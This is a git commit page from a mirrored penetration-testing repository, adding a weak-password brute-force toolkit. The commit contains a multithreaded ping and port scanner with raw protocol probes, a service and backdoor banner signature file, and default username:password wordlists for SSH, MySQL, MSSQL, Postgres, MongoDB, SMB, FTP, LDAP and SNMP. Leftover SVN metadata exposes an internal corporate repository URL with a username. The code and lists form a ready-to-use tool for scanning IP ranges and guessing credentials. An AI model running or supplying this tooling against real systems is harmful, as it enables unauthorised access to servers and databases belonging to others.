github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

暴力破解 

暴力破解小脚本
pull/4/head
InfoSec 2018-04-03 01:39:21 +08:00
parent 8ea2f263d2
commit ec86a1a1e3
77 changed files with 3582 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
Bruteforce/README.md Normal file
View File

@ -0,0 +1,23 @@
# bruteforce weak password
# ports&*weak password scanner.
$ python bruteforce.py -h
usage: main.py [-h] [--ip IP] [--threads THREADS] [--P ISPING]
[--p USER_PORTS] [--file FILE]
optional arguments:
-h, --help show this help message and exit
--ip IP ip like 192.168.1.0/24 or 192.168.0.0/16
--threads THREADS Maximum threads, default 50
--P ISPING --P not mean no ping frist,default yes
--p USER_PORTS --p scan ports;like 21,80,445 or 22-1000
--file FILE get ips or domains for this file

53
Bruteforce/bruteforce.py Normal file
View File

@ -0,0 +1,53 @@
#coding=utf-8
__author__ = 'unkonwn'
import argparse
from comm.printers import printPink,printRed,printGreen
from comm.config import *
from comm.portscan import *
from factorys.pluginFactory import *
#实例化config类
c=config()
if __name__ == '__main__':
#接受cmd参数
parser = argparse.ArgumentParser(description='ports&*weak password scanner. teams:xdsec. author: wilson ')
parser.add_argument('--ip',action="store",required=False,dest="ip",type=str,help='ip like 192.168.1.0/24 or 192.168.0.0/16')
parser.add_argument("--threads",action="store",required=False,dest="threads",type=int,default=50,help='Maximum threads, default 50')
parser.add_argument("--P",action="store",required=False,dest="isping",type=str,default='yes',help='--P not mean no ping frist,default yes')
parser.add_argument("--p",action="store",required=False,dest="user_ports",type=str,default='',help='--p scan ports;like 21,80,445 or 22-1000')
parser.add_argument("--file",action="store",required=False,dest="file",type=str,help='get ips or domains for this file')
args = parser.parse_args()
ip = args.ip
filename=args.file
#获取ip列表
if ip:
ips=c.getips(ip)
file="result/%s.txt" %args.ip.replace("/","")
elif filename:
ips=c.file2list(filename)
filename=filename.split("/")[-1]
file="result/%s.txt" %filename
else:
print "error args";exit()
isping=args.isping
user_posts=args.user_ports
threads=args.threads
p=portscan(c,user_posts)
p.run(isping,threads,ips,file)
#print p.ipdict,p.pinglist
plugins=pluginFactory(c)
for pluginname in plugins.pluginList:
#print pluginname
if pluginname:
pluginname.run(p.ipdict,p.pinglist,threads,file)

0
Bruteforce/comm/__init__.py Normal file
View File

BIN
Bruteforce/comm/__init__.pyc Normal file
View File

Binary file not shown.

45
Bruteforce/comm/config.py Normal file
View File

@ -0,0 +1,45 @@
#coding=utf-8
__author__ = 'wilson'
from IPy import IP
from comm.printers import printPink,printRed,printGreen
class config(object):
def getips(self,ip):
iplist=[]
try:
if "-" in ip.split(".")[3]:
startnum=int(ip.split(".")[3].split("-")[0])
endnum=int(ip.split(".")[3].split("-")[1])
for i in range(startnum,endnum):
iplist.append("%s.%s.%s.%s" %(ip.split(".")[0],ip.split(".")[1],ip.split(".")[2],i))
else:
ips=IP(ip)
for i in ips:
iplist.append(str(i))
return iplist
except:
printRed("[!] not a valid ip given. you should put ip like 192.168.1.0/24, 192.168.0.0/16,192.168.0.1-200")
exit()
def file2list(self,file):
iplist=[]
try:
fh = open(file)
for ip in fh.readlines():
ip=ip.strip()
iplist.append(ip)
fh.close()
return iplist
except Exception, e:
print e
exit()
def write_file(self,file,contents):
f2 = open(file,'a+')
f2.write(contents)
f2.close()

BIN
Bruteforce/comm/config.pyc Normal file
View File

Binary file not shown.

294
Bruteforce/comm/portscan.py Normal file
View File

@ -0,0 +1,294 @@
#coding=utf-8
__author__ = 'wilson'
import sys
sys.path.append("../")
from comm.config import *
from comm.printers import printPink,printRed,printGreen
import threading
from threading import Thread
from Queue import Queue
import platform
from subprocess import Popen, PIPE
import re
import time
import socket
socket.setdefaulttimeout(10) #设置了全局默认超时时间
class portscan():
"""docstring for ClassName"""
def __init__(self,c,user_ports):
self.config=c
self.PROBES =[
'\r\n\r\n',
'GET / HTTP/1.0\r\n\r\n',
'GET / \r\n\r\n',
'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08',
'\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
'\x03\0\0\x0b\x06\xe0\0\0\0\0\0',
'\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0',
'\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98',
'\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0',
'< NTP/1.2 >\n',
'< NTP/1.1 >\n',
'< NTP/1.0 >\n',
'\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))',
'\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00',
'\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04',
'\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f',
'\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0'
]
self.SIGNS =self.config.file2list("conf/signs.conf")
self.ports=[]
self.getports(user_ports)
self.lock = threading.Lock()
self.pinglist=[]
self.q=Queue()
self.sp=Queue()
self.signs=self.prepsigns()
self.ipdict={}
self.ipdict['ldap']=[]
self.ipdict['mysql']=[]
self.ipdict['mssql']=[]
self.ipdict['ftp']=[]
self.ipdict['ssh']=[]
self.ipdict['smb']=[]
self.ipdict['vnc']=[]
self.ipdict['pop3']=[]
self.ipdict['rsync']=[]
self.ipdict['http']=[]
self.ipdict['https']=[]
self.ipdict['mongodb']=[]
self.ipdict['postgres']=[]
self.ipdict['redis']=[]
self.ipdict['ssl']=[]
self.ipdict['Unknown']=[]
#获取扫描端口列表
def getports(self,user_ports):
if user_ports=='':
self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060]
else:
try:
if user_ports.find(",")>0:
for port in user_ports.split(','):
self.ports.append(int(port))
elif user_ports.find("-")>0:
startport=int(user_ports.split('-')[0])
endport=int(user_ports.split('-')[1])
for i in xrange(startport,endport+1):
self.ports.append(i)
else:
self.ports.append(int(user_ports))
except :
printRed('[!] not a valid ports given. you should put ip like 22,80,1433 or 22-1000')
exit()
#ping扫描函数
def pinger(self):
while True:
ip=self.q.get()
if platform.system()=='Linux':
p=Popen(['ping','-c 2',ip],stdout=PIPE)
m = re.search('(\d)\sreceived', p.stdout.read())
try:
if m.group(1)!='0':
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Darwin':
import commands
p=commands.getstatusoutput("ping -c 2 "+ip)
m = re.findall('ttl', p[1])
try:
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Windows':
p=Popen('ping -n 2 ' + ip, stdout=PIPE)
m = re.findall('TTL', p.stdout.read())
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
self.q.task_done()
def pingscan(self,isping,threads,ips):
starttime=time.time()
friststarttime=time.time()
print "[*] start Scanning at %s" % time.ctime()
#isping=='no' 就禁ping扫描
#默认ping 扫描
if isping=='yes':
print "Scanning for live machines..."
for i in xrange(threads):
t = Thread(target=self.pinger)
t.setDaemon(True)
t.start()
for ip in ips:
self.q.put(ip)
self.q.join()
else:
self.pinglist=ips
if len(self.pinglist)==0:
print "not find any live machine - -|||"
exit()
print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime)
def prepsigns(self):
signlist=[]
for item in self.SIGNS:
(label,pattern)=item.split('|',2)
sign=(label,pattern)
signlist.append(sign)
return signlist
def matchbanner(self,banner,slist):
#print banner
for item in slist:
p=re.compile(item[1])
#print item[1]
if p.search(banner)!=None:
return item[0]
return 'Unknown'
#扫端口及其对应服务类型函数
def scanports(self):
while True:
ip,port=self.sp.get()
#print ip,port
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#判断端口的服务类型
service='Unknown'
try:
s.connect((ip,port))
except:
self.sp.task_done()
continue
try:
result = s.recv(256)
service=self.matchbanner(result,self.signs)
except:
for probe in self.PROBES:
#print probe
try:
s.close()
sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.settimeout(5)
sd.connect((ip,port))
sd.send(probe)
except:
continue
try:
result=sd.recv(256)
service=self.matchbanner(result,self.signs)
if service!='Unknown':
break
except:
continue
if service not in self.ipdict:
self.ipdict[service]=[]
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
else:
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
self.sp.task_done()
def portsscan(self,threads,file):
print "Scanning ports now..."
print "[*] start Scanning live machines' ports at %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
st=Thread(target=self.scanports)
st.setDaemon(True)
st.start()
for scanip in self.pinglist:
for port in self.ports:
self.sp.put((scanip,port))
self.sp.join()
print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime)
#将服务端口 信息 记录文件
for name in self.ipdict.keys():
if len(self.ipdict[name]):
contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n'
self.config.write_file(contents=contents,file=file)
#处理没有识别的服务
def handleunknown(self):
for ip in self.ipdict['Unknown']:
#print ip
try:
if str(ip).split(':')[1]=='389':
self.ipdict['ldap'].append(ip)
if str(ip).split(':')[1]=='445':
self.ipdict['smb'].append(ip)
if str(ip).split(':')[1] in ['3306','3307','3308','3309']:
self.ipdict['mysql'].append(ip)
if str(ip).split(':')[1]=='1433':
self.ipdict['mssql'].append(ip)
if str(ip).split(':')[1] in ['10022','22']:
self.ipdict['ssh'].append(ip)
if str(ip).split(':')[1]=='27017':
self.ipdict['mongodb'].append(ip)
if str(ip).split(':')[1]=='110':
self.ipdict['pop3'].append(ip)
if str(ip).split(':')[1]=='5432':
self.ipdict['postgres'].append(ip)
if str(ip).split(':')[1]=='443':
self.ipdict['ssl'].append(ip)
if str(ip).split(':')[1]=='873':
self.ipdict['rsync'].append(ip)
if str(ip).split(':')[1]=='6379':
self.ipdict['redis'].append(ip)
# if str(ip).split(':')[1]=='21':
# self.ipdict['ftp'].append(ip)
except Exception as e:
print e
#处理被识别为http的mongo
for ip in self.ipdict['http']:
if str(ip).split(':')[1]=='27017':
self.ipdict['http'].remove(ip)
self.ipdict['mongodb'].append(ip)
def run(self,isping,threads,ips,file):
self.pingscan(isping,threads,ips)
self.portsscan(threads,file)
self.handleunknown()

BIN
Bruteforce/comm/portscan.pyc Normal file
View File

Binary file not shown.

78
Bruteforce/comm/printers.py Normal file
View File

@ -0,0 +1,78 @@
import ctypes,sys
import platform
if platform.system()=='Linux' or platform.system()=='Darwin':
class colors:
BLACK = '\033[0;30m'
DARK_GRAY = '\033[1;30m'
LIGHT_GRAY = '\033[0;37m'
BLUE = '\033[0;34m'
LIGHT_BLUE = '\033[1;34m'
GREEN = '\033[0;32m'
LIGHT_GREEN = '\033[1;32m'
CYAN = '\033[0;36m'
LIGHT_CYAN = '\033[1;36m'
RED = '\033[0;31m'
LIGHT_RED = '\033[1;31m'
PURPLE = '\033[0;35m'
LIGHT_PURPLE = '\033[1;35m'
BROWN = '\033[0;33m'
YELLOW = '\033[1;33m'
WHITE = '\033[1;37m'
DEFAULT_COLOR = '\033[00m'
RED_BOLD = '\033[01;31m'
ENDC = '\033[0m'
def printRed(mess):
mess=mess.strip('\r\n')
print colors.RED + mess + colors.ENDC
def printPink(mess):
mess=mess.strip('\r\n')
print colors.BLUE + mess+ colors.ENDC
def printGreen(mess):
mess=mess.strip('\r\n')
print colors.GREEN + mess + colors.ENDC
if platform.system()=='Windows':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
def set_cmd_text_color(color, handle=std_out_handle):
Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return Bool
def resetColor():
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
def printRed(mess):
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
sys.stdout.write(mess)
resetColor()
def printPink(mess):
set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY)
print(mess)
resetColor()
def printGreen(mess):
set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
sys.stdout.write(mess)
resetColor()

BIN
Bruteforce/comm/printers.pyc Normal file
View File

Binary file not shown.

BIN
Bruteforce/conf/.DS_Store vendored Normal file
View File

Binary file not shown.

11
Bruteforce/conf/.svn/all-wcprops Normal file
View File

@ -0,0 +1,11 @@
K 25
svn:wc:ra_dav:version-url
V 43
/svn/asoc/!svn/ver/2793/trunk/portScan/conf
END
config.txt
K 25
svn:wc:ra_dav:version-url
V 54
/svn/asoc/!svn/ver/2793/trunk/portScan/conf/config.txt
END

62
Bruteforce/conf/.svn/entries Normal file
View File

@ -0,0 +1,62 @@
10
dir
3928
http://weisen.cws@sources.alipay.net/svn/asoc/trunk/portScan/conf
http://weisen.cws@sources.alipay.net/svn/asoc
2014-12-16T07:44:40.829054Z
2793
pengliu.lp
4b2b8d61-1d8c-441e-9e62-9f354fa0bc87
config.txt
file
2015-08-28T10:59:17.000000Z
fedd5f2201b8a8c4cb5eb448e116d05b
2014-12-16T07:44:40.829054Z
2793
pengliu.lp
72

7
Bruteforce/conf/.svn/text-base/config.txt.svn-base Normal file
View File

@ -0,0 +1,7 @@
<task>
[global]
task_type = 1
<log>
[global]
logfile = ./log/log.txt

72
Bruteforce/conf/ftp.conf Normal file
View File

@ -0,0 +1,72 @@
ftp:ftp@163.com
ftp:ftp
ftp:1
ftp:12
ftp:123
ftp:1234
ftp:12345
ftp:123456
ftp:1234567
ftp:12345678
ftp:123456789
ftp:1234567890
ftp:654321
ftp:54321
ftp:00000000
ftp:88888888
ftp:pass
ftp:password
ftp:passwd
ftp:!@#$%^
ftp:1q2w3e
ftp:qawsed
ftp:pwd
ftp:1qaz2ws3e4
ftp:qazwsxedc
ftp:!@#$%^&*
ftp:ftp21
ftp:ftppass
ftp:ftp221
ftp:ftppassword
ftp:ftppasswd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:12345678
test:123123
test:123456789
test:test
test:654321
test:54321

27
Bruteforce/conf/ldapd.conf Normal file
View File

@ -0,0 +1,27 @@
Anonymous:
Manager:123456
Manager:secret
Manager:1
Manager:12
Manager:123
Manager:1234
Manager:12345
Manager:123456
Manager:1234567
Manager:12345678
Manager:123456789
Manager:1234567890
Manager:654321
Manager:54321
Manager:00000000
Manager:88888888
Manager:pass
Manager:password
Manager:passwd
Manager:!@#$%^
Manager:1q2w3e
Manager:qawsed
Manager:pwd
Manager:1qaz2ws3e4
Manager:qazwsxedc
Manager:!@#$%^&*

115
Bruteforce/conf/mongodb.conf Normal file
View File

@ -0,0 +1,115 @@
anonymous:
mongodb:1
mongodb:12
mongodb:123
mongodb:1234
mongodb:12345
mongodb:123456
mongodb:1234567
mongodb:12345678
mongodb:123456789
mongodb:1234567890
mongodb:654321
mongodb:54321
mongodb:mongodb
mongodb:00000000
mongodb:88888888
mongodb:pass
mongodb:password
mongodb:passwd
mongodb:!@#$%^
mongodb:1q2w3e
mongodb:qawsed
mongodb:pwd
mongodb:1qaz2ws3e4
mongodb:qazwsxedc
mongodb:!@#$%^&*
mongodb:rootpass
mongodb:rootpassword
mongodb:rootpasswd
root:1
root:12
root:root
root:root123
root:root123456
root:123
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:pass
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:test
root:qwe123
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root123
root:root123456
root:rootpass
root:rootpassword
root:rootpasswd
root:admin
root:admin123
root:-
root:_
root:1qaz2wsx
root:666666
root:888888
root:123123
root:toor
root:123abc
root:passw0rd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:123123
test:12345678
test:123456789
test:test
test:654321
test:54321

33
Bruteforce/conf/mssql.conf Normal file
View File

@ -0,0 +1,33 @@
sa:1
sa:
sa:sa
sa:sa123
sa:12
sa:123
sa:1234
sa:12345
sa:123456
sa:1234567
sa:12345678
sa:123456789
sa:1234567890
sa:654321
sa:54321
sa:00000000
sa:88888888
sa:pass
sa:password
sa:passwd
sa:!@#$%^
sa:1q2w3e
sa:qawsed
sa:pwd
sa:1qaz2ws3e4
sa:qazwsxedc
sa:!@#$%^&*
sa:sa1433
sa:sapass
sa:sa1434
sa:sapassword
sa:sapasswd
sa:aS6kR9auNM

75
Bruteforce/conf/mysql.conf Normal file
View File

@ -0,0 +1,75 @@
root:1
root:12
root:123
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:
root:root
root:root123
root:root123456
root:pass
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root3306
root:rootpass
root:root3307
root:rootpassword
root:rootpasswd
mysql:1
mysql:12
mysql:123
mysql:1234
mysql:12345
mysql:123456
mysql:1234567
mysql:12345678
mysql:123456789
mysql:1234567890
mysql:654321
mysql:54321
mysql:00000000
mysql:mysql
mysql:88888888
mysql:pass
mysql:password
mysql:passwd
mysql:!@#$%^
mysql:1q2w3e
mysql:qawsed
mysql:pwd
mysql:1qaz2ws3e4
mysql:qazwsxedc
mysql:!@#$%^&*
mysql:root3306
mysql:rootpass
mysql:root3307
mysql:rootpassword
mysql:rootpasswd
test:1
test:123123
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:12345678
test:123456789
test:test
test:654321

0
Bruteforce/conf/pop3.conf Normal file
View File

64
Bruteforce/conf/postgres.conf Normal file
View File

@ -0,0 +1,64 @@
root:1
root:12
root:123
root:x90x00
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:root
root:root123
root:root123456
root:pass
root:motianlun
root:mofashi
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root3306
root:rootpass
root:root3307
root:rootpassword
root:rootpasswd
postgres:1
postgres:12
postgres:123
postgres:1234
postgres:12345
postgres:123456
postgres:1234567
postgres:12345678
postgres:123456789
postgres:1234567890
postgres:postgres
postgres:654321
postgres:54321
postgres:88888888
postgres:pass
postgres:password
postgres:passwd
postgres:!@#$%^
postgres:1q2w3e
postgres:qawsed
postgres:pwd
postgres:1qaz2ws3e4
postgres:qazwsxedc
postgres:!@#$%^&*
postgres:postgres654321
postgres:postgres123456
postgres:postgres123
postgres:postgrespassword
postgres:postgrespasswd

80
Bruteforce/conf/signs.conf Normal file
View File

@ -0,0 +1,80 @@
http|^HTTP.*
http|^HTTP/0.
http|^HTTP/1.
http|<HEAD>.*<BODY>
http|<HTML>.*
http|<html>.*
http|<!DOCTYPE.*
http|^Invalid requested URL
http|.*<?xml
http|^HTTP/.*\nServer: Apache/1
http|^HTTP/.*\nServer: Apache/2
http|.*Microsoft-IIS.*
http|^HTTP/.*\nServer: Microsoft-IIS
http|^HTTP/.*Cookie.*ASPSESSIONID
http|^<h1>Bad Request .Invalid URL.</h1>
redis|ERR unknown command
redis|ERR wrong number of arguments
mongodb|^.*version.....([\.\d]+)
pop3|.*POP3.*
pop3|.*pop3.*
ssh|SSH-2.0-OpenSSH.*
ssh|SSH-1.0-OpenSSH.*
ssh|.*ssh.*
backdoor-fxsvc|^500 Not Loged in
backdoor-shell|GET: command
backdoor-shell|sh: GET:
bachdoor-shell|[a-z]*sh: .* command not found
backdoor-shell|^bash[$#]
backdoor-shell|^sh[$#]
backdoor-cmdshell|^Microsoft Windows .* Copyright .*>
ftp|^220.*\n331
ftp|^220.*\n530
ftp|^220.*FTP
ftp|^220 .* Microsoft .* FTP
ftp|^220 Inactivity timer
ftp|^220 .* UserGate
ftp|^220(.*?)
ldap|^\x30\x0c\x02\x01\x01\x61
ldap|^\x30\x32\x02\x01
ldap|^\x30\x33\x02\x01
ldap|^\x30\x38\x02\x01
ldap|^\x30\x84
ldap|^\x30\x45
ldap|^\x30.*
smb|^\0\0\0.\xffSMBr\0\0\0\0.*
mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.*
mssql|^\x05\x6e\x00
mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.*
mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.*
mssql|^\x04\x01\x00\x25\x00\x00\x01.*
mysql|^\x19\x00\x00\x00\x0a
mysql|^\x2c\x00\x00\x00\x0a
mysql|hhost \'
mysql|khost \'
mysql|mysqladmin
mysql|(.*)5(.*)log
mysql|(.*)4(.*)log
mysql|whost \'
mysql|^\(\x00\x00
mysql|this MySQL
mysql|^N\x00
mysql|(.*)mysql(.*)
mssql|;MSSQLSERVER;
oracle|\(ERROR_STACK=\(ERROR=\(CODE=
oracle|\(ADDRESS=\(PROTOCOL=
postgres|Invalid packet length
postgres|^EFATAL
rsync|^@RSYNCD:.*
snmp|\x70\x75\x62\x6c\x69\x63\xa2
snmp|\x41\x01\x02
ssh|^SSH-
ssh|^SSH-.*openssh
telnet|^\xff\xfd
telnet-disabled|Telnet is disabled now
telnet|^\xff\xfe
telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.*
vnc|^RFB.*'

67
Bruteforce/conf/smb.conf Normal file
View File

@ -0,0 +1,67 @@
administrator:1
administrator:12
administrator:
administrator:administrator
administrator:123
administrator:1234
administrator:12345
administrator:123456
administrator:1234567
administrator:12345678
administrator:123456789
administrator:1234567890
administrator:654321
administrator:54321
administrator:00000000
administrator:88888888
administrator:pass
administrator:password
administrator:passwd
administrator:!@#$%^
administrator:1q2w3e
administrator:qawsed
administrator:pwd
administrator:1qaz2ws3e4
administrator:qazwsxedc
administrator:!@#$%^&*
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:123123
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:12345678
test:123456789
test:test
test:654321
test:54321

1
Bruteforce/conf/snmp.conf Normal file
View File

@ -0,0 +1 @@
public

86
Bruteforce/conf/ssh.conf Normal file
View File

@ -0,0 +1,86 @@
root:1
root:12
root:root
root:root123
root:root123456
root:123
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:pass
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:test
root:qwe123
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root123
root:root123456
root:rootpass
